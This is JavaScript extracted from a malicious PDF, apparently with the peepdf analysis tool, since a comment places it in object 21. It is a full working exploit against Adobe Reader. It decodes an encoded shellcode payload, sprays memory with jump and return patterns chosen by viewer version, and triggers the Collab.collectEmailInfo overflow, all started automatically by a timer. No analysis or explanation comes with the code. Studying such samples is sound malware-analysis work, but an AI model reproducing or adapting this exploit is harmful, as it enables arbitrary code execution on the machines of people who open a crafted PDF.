// peepdf comment: Javascript code located in object 21 (version 3)

function re(count, what) {
    var v = "";
    while (--count >= 0)
    v += what;
    return v;
}

function start() {
    sc = unescape("%u9090%u9090%u9090%ueb90%u5e18%u5b56%u068a%u303c%u1474%u6b66%u58c0" + "%u8a46%u3226%u88c4%u4303%ueb46%ue8eb%uffe3%uffff" + "%u5048%u5048%u5048%u5048%u5942%u6841%u5941%u5841" + "%u5841%u6d48%u5843%u5a43%u5842%u7841%u5841%u5841" + "%u5841%u4948%u6744%u4348%u7442%u5041%u4348%u7742" + "%u6444%u6341%u4142%u6546%u5445%u7342%u6b41%u7042" + "%u6c43%u4b48%u4843%u6841%u4b48%u4843%u5441%u4b48" + "%u7843%u4441%u6d48%u4b48%u4843%u5041%u5345%u5841" + "%u7342%u6843%u4b48%u6443%u4444%u4444%u4b48%u4d43" + "%u6441%u4b48%u4446%u7041%u7043%u6344%u6542%u4b48" + "%u4243%u7844%u4b48%u5243%u7841%u6344%u6d42%u5342" + "%u6c41%u4143%u4b48%u6c41%u4b48%u6344%u4542%u6b41" + "%u4f42%u6b41%u7042%u4c42%u6c48%u4448%u7042%u6446" + "%u6744%u7142%u7745%u5541%u6344%u4842%u5345%u4442" + "%u6341%u7443%u4444%u7041%u6546%u5142%u4b48%u5243" + "%u4444%u6344%u6d42%u6e43%u4b48%u5441%u4343%u4b48" + "%u5243%u4441%u6344%u6d42%u4b48%u6444%u4b48%u6344" + "%u7542%u4948%u4c43%u4444%u4441%u6943%u7342%u6b41" + "%u7942%u5943%u4d48%u4d43%u5a43%u5843%u7846%u5841" + "%u6444%u5841%u5841%u4f42%u6546%u4643%u4f42%u6546" + "%u6641%u4f42%u4546%u7844%u6b41%u7942%u6e43%u4b48" + "%u4543%u5a43%u4b48%u6546%u4643%u4b48%u4e42%u734b" + "%u5641%u5641%u5641%u5641%u4148%u7342%u5941%u5941" + "%u5941%u5941%u6e43%u7142%u5942%u5a41%u6d48%u6b41" + "%u7342%u6b48%u5242%u4a42%u6b41%u7942%u5943%u4d48" + "%u4d43%u4646%u5843%u4f42%u6546%u5a43%u4b48%u4546" + "%u4643%u5a43%u4f42%u6546%u4a43%u4f42%u4546%u4441" + "%u4b48%u4546%u4646%u7141%u4546%u5243%u4348%u7543" + "%u5243%u5841%u7743%u6b48%u4f42%u6546%u4a43%u4f42" + "%u4546%u6444%u7342%u7643%u6842%u5242%u6346%u4b42" + "%u5748%u4d42%u5741%u6b41%u7a42%u4a48%u5343%u4743" + "%u6344%u7742%u774b%u7843%u6346%u5745%u6e41%u6548" + "%u4f41%u5841%u7443%u4e41%u6d43%u4a42%u4841%u4741" + "%u7143%u5241%u5842%u6c48%u5041%u6a42%u6646%u6d48" + "%u534b%u7543%u6f42%u5848%u4e42%u4a48%u5641%u5445" + "%u5748%u6344%u5441%u7841%u4943%u6b43%u7a43%u6743" + "%u5a43%u6c43%u6b41%u6a41%u7641%u6d43%u7043%u6d43" + "%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841" + "%u5841%u6a48%u6a48%u6a48%u6a48%u5841%u5841%u5841" + "%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841" + "%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841" + "%u5841%u5842%u5841%u5841%u5841%u5841%u5543%u4148" + "%u5545%u6b43%u5841%u5841%u5841%u5842%u6442%u4e42" + "%u4f42%u4f42%u4b48%u6845%u4b48%u4542%u4b48%u4e42" + "%u4b48%u7645%u4348%u7142%u6841%u5842%u6f48%u4e42" + "%u4f42%u4f42%u6b41%u7942%u4948%u4543%u6641%u4348" + "%u4d43%u6641%u6444%u6b41%u7942%u5943%u4f42%u6546" + "%u6641%u4f42%u4546%u4444%u6541%u5841%u7148%u4a41" + "%u5841%u7a43%u5445%u6541%u5841%u7448%u4a41%u5841" + "%u6746%u5542%u6b41%u7942%u5943%u5943%u7846%u6841" + "%u7844%u5841%u5841%u4f42%u6546%u6641%u4f42%u4546" + "%u7841%u6b41%u7942%u5943%u4d48%u4d43%u5a43%u5843" + "%u4943%u7142%u5142%u5a41%u5943%u4d48%u4d43%u4e43" + "%u5843%u4f42%u6546%u6641%u4f42%u4546%u7844%u6b41" + "%u7942%u5943%u5943%u7846%u6c41%u7844%u5841%u5841" + "%u4f42%u6546%u6641%u4f42%u4546%u7841%u7846%u4f42" + "%u5841%u5841%u5841%u6243%u4843%u4f42%u4546%u7441" + "%u4948%u4d43%u4243%u5843%u7846%u4f42%u5841%u5841" + "%u5841%u4f42%u4546%u5041%u4f42%u6546%u4243%u4f42" + "%u4546%u5441%u4546%u6b41%u7942%u5943%u7846%u484b" + "%u5841%u5841%u5841%u6243%u5a41%u5943%u4943%u5943" + "%u7846%u5841%u5841%u5841%u4843%u4d48%u4d43%u6841" + "%u5843%u4348%u4d43%u4c41%u6544%u5345%u5241%u4b48" + "%u4542%u5048%u5048%u4546%u4b48%u5445%u4f42%u6e43" + "%u4c41%u5842%u4142%u4f42%u4f42%u4f42%u5543%u4348" + "%u4842%u4f42%u6546%u5a41%u5345%u6141%u4948%u4d43" + "%u4a43%u7846%u5841%u6444%u5841%u5841%u6243%u4843" + "%u4f42%u4546%u7441%u4948%u4d43%u4643%u4b48%u4d43" + "%u4e43%u4948%u4d43%u5243%u5842%u6e43%u4e42%u4f42" + "%u4f42%u4546%u6b41%u7942%u5943%u4d48%u4d43%u6841" + "%u5843%u4348%u4d43%u7041%u6544%u5345%u5241%u4b48" + "%u4542%u5048%u5048%u4546%u4b48%u5445%u4f42%u6e43" + "%u7041%u5842%u4142%u4f42%u4f42%u4f42%u5543%u6243" + "%u5841%u4f42%u4546%u5841%u5048%u5048%u5048%u5048" + "%u3030");

    if (app.viewerVersion >= 7.0) {
        plin = re(1124, unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u9090%u9090") +

        re(122, unescape("%u0b0b%u0028%u06eb%u06eb")) + sc + re(1256, unescape("%u4141%u4141"));
    } else {
        ef6 = unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
        plin = re(80, unescape("%u9090%u9090")) + sc + re(80, unescape("%u9090%u9090")) + unescape("%ue7e9%ufff9") + unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
        while ((plin.length % 8) != 0)
        plin = unescape("%u4141") + plin;
        plin += re(2626, ef6);
    }
    if (app.viewerVersion >= 6.0) {
        this.collabStore = Collab.collectEmailInfo({
            subj: "",
            msg: plin
        });
    }
}
//start
var shaft = app.setTimeOut("start()", 1200);

